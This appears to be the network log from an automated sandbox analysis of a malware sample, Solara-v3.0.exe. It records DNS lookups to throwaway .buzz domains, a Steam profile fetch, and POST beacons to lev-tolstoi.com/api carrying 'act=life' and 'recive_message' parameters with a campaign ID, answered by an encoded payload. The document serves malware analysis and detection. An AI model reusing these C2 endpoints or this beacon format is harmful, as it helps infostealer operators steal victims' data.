                                                                                                                                                                                                                                            Dec 28, 2024 02:54:57.564017057 CET192.168.2.51.1.1.10x4c41Standard query (0)screwamusresz.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:57.703572035 CET192.168.2.51.1.1.10x796aStandard query (0)appliacnesot.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:57.846935034 CET192.168.2.51.1.1.10xd5fStandard query (0)cashfuzysao.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:57.993944883 CET192.168.2.51.1.1.10x9116Standard query (0)hummskitnj.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:58.210289001 CET192.168.2.51.1.1.10x39b2Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:00.821491957 CET192.168.2.51.1.1.10xb878Standard query (0)lev-tolstoi.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                            DNS Answers

                                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:56.993011951 CET1.1.1.1192.168.2.50x6d7Name error (3)mindhandru.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:57.135519028 CET1.1.1.1192.168.2.50x19f2Name error (3)prisonyfork.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:57.279089928 CET1.1.1.1192.168.2.50xa01aName error (3)rebuildeso.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:57.420448065 CET1.1.1.1192.168.2.50x9548Name error (3)scentniej.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:57.560283899 CET1.1.1.1192.168.2.50xb055Name error (3)inherineau.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:57.701679945 CET1.1.1.1192.168.2.50x4c41Name error (3)screwamusresz.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:57.841408968 CET1.1.1.1192.168.2.50x796aName error (3)appliacnesot.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:57.984738111 CET1.1.1.1192.168.2.50xd5fName error (3)cashfuzysao.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:58.131542921 CET1.1.1.1192.168.2.50x9116Name error (3)hummskitnj.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:58.347234964 CET1.1.1.1192.168.2.50x39b2No error (0)steamcommunity.com23.55.153.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:00.959465027 CET1.1.1.1192.168.2.50xb878No error (0)lev-tolstoi.com104.21.66.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:00.959465027 CET1.1.1.1192.168.2.50xb878No error (0)lev-tolstoi.com172.67.157.254A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                                                                                                            • steamcommunity.com
                                                                                                                                                                                                                                            • lev-tolstoi.com

                                                                                                                                                                                                                                            HTTPS Proxied Packets

                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            0192.168.2.54970823.55.153.1064435668C:\Users\user\Desktop\Solara-v3.0.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-28 01:54:59 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Host: steamcommunity.com
                                                                                                                                                                                                                                            2024-12-28 01:55:00 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                            Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Date: Sat, 28 Dec 2024 01:55:00 GMT
                                                                                                                                                                                                                                            Content-Length: 35121
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: sessionid=e8419891c513e89f96234b9b; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                            Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                            2024-12-28 01:55:00 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                                            2024-12-28 01:55:00 UTC10097INData Raw: 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f 52 54 09
                                                                                                                                                                                                                                            Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
                                                                                                                                                                                                                                            2024-12-28 01:55:00 UTC10545INData Raw: 4e 49 56 45 52 53 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 70 75 62 6c 69 63 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4c 41 4e 47 55 41 47 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 65 6e 67 6c 69 73 68 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 55 4e 54 52 59 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 53 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 43 4f 4d 4d 55 4e 49 54 59 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74
                                                                                                                                                                                                                                            Data Ascii: NIVERSE&quot;:&quot;public&quot;,&quot;LANGUAGE&quot;:&quot;english&quot;,&quot;COUNTRY&quot;:&quot;US&quot;,&quot;MEDIA_CDN_COMMUNITY_URL&quot;:&quot;https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/&quot;,&quot;MEDIA_CDN_URL&quot;:&quot;htt


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            1192.168.2.549709104.21.66.864435668C:\Users\user\Desktop\Solara-v3.0.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-28 01:55:02 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                                                                            Host: lev-tolstoi.com
                                                                                                                                                                                                                                            2024-12-28 01:55:02 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                            Data Ascii: act=life
                                                                                                                                                                                                                                            2024-12-28 01:55:02 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Sat, 28 Dec 2024 01:55:02 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=rbskcphtngf04t5lpt3kd6p671; expires=Tue, 22 Apr 2025 19:41:41 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wna680s%2FhSmK4XK5jwKK5g0BNLXX5E9NGRgcT%2BwD7yQf%2Bapn0QAYGh%2BDgK2RPvDZ4YPlCLajSnw7qU3n%2BG5ddtXO7pb6YZQBZw%2FCTi5ho1vwggbm4uCIiuez8ZGLhR0bF%2Bg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8f8ded045dad7ced-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1806&min_rtt=1798&rtt_var=690&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=906&delivery_rate=1567364&cwnd=179&unsent_bytes=0&cid=bb771fe3eb917f7e&ts=760&x=0"
                                                                                                                                                                                                                                            2024-12-28 01:55:02 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 2ok
                                                                                                                                                                                                                                            2024-12-28 01:55:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            2192.168.2.549710104.21.66.864435668C:\Users\user\Desktop\Solara-v3.0.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-28 01:55:04 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 51
                                                                                                                                                                                                                                            Host: lev-tolstoi.com
                                                                                                                                                                                                                                            2024-12-28 01:55:04 UTC51OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 38 39 39 30 38 33 34 34 30 26 6a 3d
                                                                                                                                                                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=yau6Na--899083440&j=
                                                                                                                                                                                                                                            2024-12-28 01:55:05 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Sat, 28 Dec 2024 01:55:04 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=5eau30eaiifh8hb3isi1imtbhl; expires=Tue, 22 Apr 2025 19:41:43 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KOWJq6Jpuc5m%2FdL7DdSmZG666nmQTxd0mordr8Mvu4a%2FN5ovgjIakBTNW1RVYx7GIAJUeez04F0r1qj%2F%2FHdNSNR28HAUHBtkEV5qxHIUm4zRw0vQ1tn72TR7baothwwn6cc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8f8ded113f0b2361-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1816&min_rtt=1797&rtt_var=713&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=950&delivery_rate=1495135&cwnd=239&unsent_bytes=0&cid=3a092119d1766c5b&ts=784&x=0"
                                                                                                                                                                                                                                            2024-12-28 01:55:05 UTC244INData Raw: 31 63 61 66 0d 0a 4e 47 54 53 6e 67 4c 36 59 2f 43 6d 55 65 36 49 55 52 6b 47 7a 74 6c 34 6f 6e 31 4b 62 51 4e 54 68 30 65 73 49 47 4d 75 55 33 70 50 52 71 53 38 4f 4d 35 50 30 74 55 30 7a 4c 49 6c 61 33 4f 72 39 56 72 44 47 57 68 58 5a 54 4c 72 4e 4d 6b 4d 51 56 67 2b 57 41 34 43 73 2f 4a 78 6e 30 2f 53 77 79 6e 4d 73 67 70 69 4a 4b 75 33 57 70 68 66 4c 77 64 68 4d 75 73 6c 7a 55 73 4d 58 6a 38 5a 58 41 69 31 39 6d 65 5a 42 35 48 4b 50 49 76 74 4e 48 68 73 6f 4c 41 56 79 68 42 6f 51 53 45 32 2f 57 57 57 41 69 35 4c 4a 78 74 35 42 61 48 31 49 49 64 50 69 34 51 30 67 4b 70 72 4f 32 65 72 75 78 54 45 47 53 45 46 61 7a 76 6a 4a 4d 68 4b 45 30 63 31 45 6c 77 47 74 76 64 74 6b 42 4f 63 77 44 75 41 36 7a 35 34 4a 4f 4c 37 48 64
                                                                                                                                                                                                                                            Data Ascii: 1cafNGTSngL6Y/CmUe6IURkGztl4on1KbQNTh0esIGMuU3pPRqS8OM5P0tU0zLIla3Or9VrDGWhXZTLrNMkMQVg+WA4Cs/Jxn0/SwynMsgpiJKu3WphfLwdhMuslzUsMXj8ZXAi19meZB5HKPIvtNHhsoLAVyhBoQSE2/WWWAi5LJxt5BaH1IIdPi4Q0gKprO2eruxTEGSEFazvjJMhKE0c1ElwGtvdtkBOcwDuA6z54JOL7Hd
                                                                                                                                                                                                                                            2024-12-28 01:55:05 UTC1369INData Raw: 68 66 63 45 38 79 41 2b 59 30 33 31 63 4d 58 44 64 59 53 55 69 70 76 47 65 55 51 63 71 45 4f 34 44 6b 4e 6e 68 72 71 37 6f 61 30 68 41 6f 44 47 6b 35 34 53 2f 42 54 51 35 43 4f 78 39 65 44 37 66 7a 5a 35 41 48 6e 63 64 7a 77 71 6f 30 59 79 54 30 2b 7a 72 51 48 43 73 62 62 43 43 6c 4f 6f 42 62 51 55 73 39 57 41 35 47 74 76 4a 68 6c 51 47 41 7a 44 69 48 37 79 46 77 62 61 47 32 47 73 30 56 4a 77 78 68 4e 75 38 76 77 55 67 46 51 54 77 65 56 67 62 77 73 69 43 66 47 64 4b 63 63 36 2f 76 49 33 78 6f 75 76 6b 67 67 41 42 6d 46 69 45 32 36 57 57 57 41 67 6c 4a 4d 68 74 64 43 62 50 30 61 34 6f 42 67 4d 49 2b 69 66 67 31 66 6d 71 6d 75 41 6a 4b 45 53 34 4d 61 44 72 73 49 4d 6c 47 51 51 4a 78 48 30 35 47 36 4c 78 42 6c 51 71 65 7a 69 53 4d 71 69 77 31 66 65 79 38 46
                                                                                                                                                                                                                                            Data Ascii: hfcE8yA+Y031cMXDdYSUipvGeUQcqEO4DkNnhrq7oa0hAoDGk54S/BTQ5COx9eD7fzZ5AHncdzwqo0YyT0+zrQHCsbbCClOoBbQUs9WA5GtvJhlQGAzDiH7yFwbaG2Gs0VJwxhNu8vwUgFQTweVgbwsiCfGdKcc6/vI3xouvkggABmFiE26WWWAglJMhtdCbP0a4oBgMI+ifg1fmqmuAjKES4MaDrsIMlGQQJxH05G6LxBlQqeziSMqiw1fey8F
                                                                                                                                                                                                                                            2024-12-28 01:55:05 UTC1369INData Raw: 41 62 44 32 6c 61 34 35 46 47 51 78 70 57 48 77 46 70 50 39 71 32 6a 53 52 79 6a 32 4c 2f 48 4e 6b 4b 72 58 37 48 63 78 66 63 45 39 73 4d 4f 30 6a 33 45 30 4d 54 7a 38 57 57 51 4f 2f 39 47 43 59 44 4a 66 41 4f 49 66 70 50 6e 39 32 70 72 73 53 78 52 34 69 42 53 46 2f 70 53 4c 57 41 6c 6b 4d 41 41 39 64 52 49 58 2f 62 70 59 47 68 49 51 73 77 76 4e 7a 66 47 6a 73 34 31 72 4e 46 79 30 4b 62 6a 44 76 4b 38 74 49 44 55 51 2f 47 30 51 4a 74 50 78 73 6b 41 75 66 79 6a 65 45 34 7a 68 77 59 71 79 36 45 49 42 52 61 41 68 35 63 62 31 6c 2b 6b 55 4e 51 54 35 61 59 77 57 2b 38 6d 65 4f 51 59 32 4b 4b 73 7a 74 50 7a 73 38 37 4c 63 54 77 42 51 69 43 32 45 32 36 43 44 4e 52 51 4a 42 4e 68 4a 59 41 62 54 77 61 5a 55 48 6b 73 4d 33 69 66 67 32 63 6d 69 67 2b 31 53 41 47 44
                                                                                                                                                                                                                                            Data Ascii: AbD2la45FGQxpWHwFpP9q2jSRyj2L/HNkKrX7HcxfcE9sMO0j3E0MTz8WWQO/9GCYDJfAOIfpPn92prsSxR4iBSF/pSLWAlkMAA9dRIX/bpYGhIQswvNzfGjs41rNFy0KbjDvK8tIDUQ/G0QJtPxskAufyjeE4zhwYqy6EIBRaAh5cb1l+kUNQT5aYwW+8meOQY2KKsztPzs87LcTwBQiC2E26CDNRQJBNhJYAbTwaZUHksM3ifg2cmig+1SAGD
                                                                                                                                                                                                                                            2024-12-28 01:55:05 UTC1369INData Raw: 70 53 4c 43 41 6c 6b 4d 4f 42 46 45 43 4c 37 31 62 5a 34 4a 6c 63 6f 2b 68 2b 77 34 66 47 4f 71 74 68 4c 4e 47 69 73 4f 5a 54 76 33 4a 73 56 49 44 45 5a 78 56 68 59 42 71 4c 77 34 32 43 61 65 37 53 4f 58 2b 43 55 37 65 2b 4b 69 57 73 63 54 61 46 63 68 4d 75 6f 73 77 55 6f 4a 51 7a 34 63 57 41 43 32 38 57 57 58 43 34 44 4d 50 59 48 68 50 48 42 32 72 4c 59 65 7a 42 73 67 42 47 74 78 71 32 58 4a 57 6b 45 55 63 53 31 62 43 62 44 2f 64 74 67 65 33 4e 31 7a 69 2b 5a 7a 49 79 53 67 74 52 72 50 45 79 51 45 61 54 44 70 4b 38 6c 48 43 45 51 35 43 6c 63 43 75 50 31 75 6c 77 43 57 77 54 61 49 37 54 64 39 61 2b 7a 31 57 73 63 48 61 46 63 68 48 73 49 51 6a 47 4d 37 44 43 35 57 54 30 61 33 38 43 44 41 51 5a 37 48 50 34 54 6c 4e 58 4a 6f 70 72 49 52 7a 42 51 73 41 32 67
                                                                                                                                                                                                                                            Data Ascii: pSLCAlkMOBFECL71bZ4Jlco+h+w4fGOqthLNGisOZTv3JsVIDEZxVhYBqLw42Cae7SOX+CU7e+KiWscTaFchMuoswUoJQz4cWAC28WWXC4DMPYHhPHB2rLYezBsgBGtxq2XJWkEUcS1bCbD/dtge3N1zi+ZzIySgtRrPEyQEaTDpK8lHCEQ5ClcCuP1ulwCWwTaI7Td9a+z1WscHaFchHsIQjGM7DC5WT0a38CDAQZ7HP4TlNXJoprIRzBQsA2g
                                                                                                                                                                                                                                            2024-12-28 01:55:05 UTC1369INData Raw: 30 4d 48 58 6a 59 52 52 41 69 39 38 32 69 51 43 4a 50 41 4e 6f 48 73 50 33 46 6c 71 37 55 55 79 46 39 6d 54 32 59 70 70 58 32 4f 59 78 46 58 49 77 35 62 4a 37 33 7a 49 49 64 50 69 34 51 30 67 4b 70 72 4f 32 32 2b 76 78 66 53 46 69 38 42 62 6a 4c 33 4a 4d 4e 4a 45 30 73 2b 48 46 45 4b 74 76 4e 6d 6d 51 53 59 79 44 53 4a 34 54 78 33 4a 4f 4c 37 48 64 68 66 63 45 39 50 4f 76 59 79 7a 55 77 4b 57 69 70 59 53 55 69 70 76 47 65 55 51 63 71 45 4d 49 66 68 4e 33 74 6f 72 4c 38 58 77 41 30 6e 43 47 59 34 37 6a 66 45 52 51 5a 48 4f 52 4e 5a 41 4b 4c 77 62 6f 6f 45 67 4e 5a 7a 77 71 6f 30 59 79 54 30 2b 79 7a 48 44 7a 67 4d 49 77 44 7a 4a 74 68 4a 44 45 42 78 42 78 67 66 38 50 74 73 32 46 6e 53 77 6a 79 46 36 54 78 36 62 61 43 32 48 38 6b 61 4b 51 6c 6c 4f 2b 38 6c
                                                                                                                                                                                                                                            Data Ascii: 0MHXjYRRAi982iQCJPANoHsP3Flq7UUyF9mT2YppX2OYxFXIw5bJ73zIIdPi4Q0gKprO22+vxfSFi8BbjL3JMNJE0s+HFEKtvNmmQSYyDSJ4Tx3JOL7HdhfcE9POvYyzUwKWipYSUipvGeUQcqEMIfhN3torL8XwA0nCGY47jfERQZHORNZAKLwbooEgNZzwqo0YyT0+yzHDzgMIwDzJthJDEBxBxgf8Pts2FnSwjyF6Tx6baC2H8kaKQllO+8l
                                                                                                                                                                                                                                            2024-12-28 01:55:05 UTC1369INData Raw: 4e 2f 41 52 59 42 76 4c 77 34 32 41 4b 56 78 7a 4b 47 34 7a 39 30 59 36 69 70 45 4d 63 4e 4b 51 35 71 50 4f 6b 6c 77 30 38 4c 54 54 67 56 57 67 75 33 2b 32 2b 64 51 64 79 45 4e 4a 53 71 61 7a 74 46 6f 62 41 57 6d 30 56 6f 45 43 38 6f 70 53 4c 43 41 6c 6b 4d 4d 52 4a 54 44 4c 33 2f 62 35 73 54 6b 38 49 68 6a 4f 63 35 61 57 36 6e 76 68 66 4e 45 69 73 4a 5a 7a 72 70 4e 38 64 43 41 6b 64 78 56 68 59 42 71 4c 77 34 32 43 4b 46 30 6a 6d 4c 35 69 56 77 5a 61 2b 74 46 39 42 66 5a 6b 39 77 4e 76 52 6c 6c 6c 51 52 57 7a 59 48 47 42 2f 77 2b 32 7a 59 57 64 4c 43 4f 6f 72 74 4e 58 56 32 71 62 30 56 7a 78 59 68 43 32 6b 79 35 53 48 4b 52 51 52 50 50 52 4e 52 42 62 2f 34 61 5a 59 49 6e 59 52 39 7a 4f 30 72 4f 7a 7a 73 6d 67 48 44 45 79 56 50 66 6e 2f 38 5a 63 6c 4f 51
                                                                                                                                                                                                                                            Data Ascii: N/ARYBvLw42AKVxzKG4z90Y6ipEMcNKQ5qPOklw08LTTgVWgu3+2+dQdyENJSqaztFobAWm0VoEC8opSLCAlkMMRJTDL3/b5sTk8IhjOc5aW6nvhfNEisJZzrpN8dCAkdxVhYBqLw42CKF0jmL5iVwZa+tF9BfZk9wNvRlllQRWzYHGB/w+2zYWdLCOortNXV2qb0VzxYhC2ky5SHKRQRPPRNRBb/4aZYInYR9zO0rOzzsmgHDEyVPfn/8ZclOQ
                                                                                                                                                                                                                                            2024-12-28 01:55:05 UTC262INData Raw: 4f 52 70 44 33 64 70 30 47 68 49 59 47 6a 2b 51 39 66 48 4c 73 70 43 57 4f 58 79 63 56 49 57 6e 63 50 49 35 46 44 51 78 70 57 45 4d 42 73 50 74 36 6a 67 61 65 31 54 69 42 35 68 46 30 59 37 71 34 46 63 4d 4f 49 55 4e 71 50 4b 56 72 6a 6b 55 5a 44 47 6c 59 65 51 47 6d 2f 30 2b 62 45 4a 75 45 66 63 7a 74 4a 54 73 38 37 49 56 61 30 68 77 34 44 47 34 67 32 32 57 57 57 7a 38 4d 4f 67 35 52 46 72 50 71 61 35 55 4e 67 2f 70 7a 31 4c 35 68 4b 54 62 2b 36 51 57 41 41 42 64 42 49 54 43 6c 66 66 64 62 51 56 70 78 51 41 52 49 38 4f 34 67 77 45 48 56 78 79 47 65 37 44 42 74 5a 2b 75 46 4a 4f 63 4a 49 67 68 78 4e 76 49 71 6a 67 78 42 51 33 46 41 62 30 61 35 2b 33 75 4a 46 35 2f 55 4e 4d 7a 56 66 54 74 38 37 4f 4e 61 39 52 77 6d 41 57 59 6e 39 47 6a 70 56 41 74 4c 49 52
                                                                                                                                                                                                                                            Data Ascii: ORpD3dp0GhIYGj+Q9fHLspCWOXycVIWncPI5FDQxpWEMBsPt6jgae1TiB5hF0Y7q4FcMOIUNqPKVrjkUZDGlYeQGm/0+bEJuEfcztJTs87IVa0hw4DG4g22WWWz8MOg5RFrPqa5UNg/pz1L5hKTb+6QWAABdBITClffdbQVpxQARI8O4gwEHVxyGe7DBtZ+uFJOcJIghxNvIqjgxBQ3FAb0a5+3uJF5/UNMzVfTt87ONa9RwmAWYn9GjpVAtLIR
